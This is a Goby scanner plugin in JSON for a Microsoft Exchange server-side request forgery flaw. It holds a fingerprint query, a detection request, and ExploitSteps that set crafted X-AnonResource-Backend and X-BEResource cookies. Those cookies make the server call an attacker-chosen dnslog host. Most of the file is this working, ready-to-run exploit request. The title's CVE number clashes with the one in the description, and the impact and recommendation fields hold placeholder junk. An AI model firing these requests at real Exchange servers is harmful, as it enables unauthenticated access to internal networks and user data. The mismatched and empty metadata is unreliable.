Goby/json/Microsoft Exchange SSRF┬⌐╢┤ CVE-2021-26885.json

{
      "Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26885",
      "Level": "1",
      "Tags": [
            "SSRF"
      ],
      "GobyQuery": "(app=\"Microsoft-Exchange\" || title=\"Outlook\")",
      "Description": "Exchange Server 是微软公司的一套电子邮件服务组件，是个消息与协作系统。2021年03月3日，微软官方发布了Microsoft Exchange安全更新，披露了多个高危严重漏洞，其中：在 CVE-2021-26855 Exchange SSRF漏洞中，攻击者可直接构造恶意请求，以Exchange server的身份发起任意HTTP请求，扫描内网，并且可获取Exchange用户信息。该漏洞利用无需身份认证",
      "Product": "Exchange",
      "Homepage": "microsoft.com",
      "Author": "PeiQi",
      "Impact": "<p>🐏</p>",
      "Recommandation": "<p>undefined</p>",
      "References": [
            "http://wiki.peiqi.tech"
      ],
	  "HasExp": true,
	  "ExpParams": [
		{
			"name": "Dnslog",
			"type": "input",
			"value": "xxx.dnslog.cn",
			"show": ""
		}
	  ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/ecp/PeiQi.js",
                        "follow_redirect": false,
                        "header": {
                              "Cookie": "X-BEResource=peiqi_wiki/api/endpoint#~1; X-AnonResource=true"
                        },
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "500",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "NegotiateSecurityContext",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
	  "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/owa/auth/PeiQi.js",
                        "follow_redirect": false,
                        "header": {
                              "Cookie": "X-AnonResource=true; X-AnonResource-Backend={{{Dnslog}}}/ecp/default.flt?~3; X-BEResource={{{Dnslog}}}/owa/auth/logon.aspx?~3;"
                        },
                        "data_type": "text",
                        "data": ""
                  },
                  "SetVariable": [
					"output|lastbody"
				  ]
            }
      ],
      "PostTime": "2021-03-13 14:34:38",
      "GobyVersion": "1.8.237"
}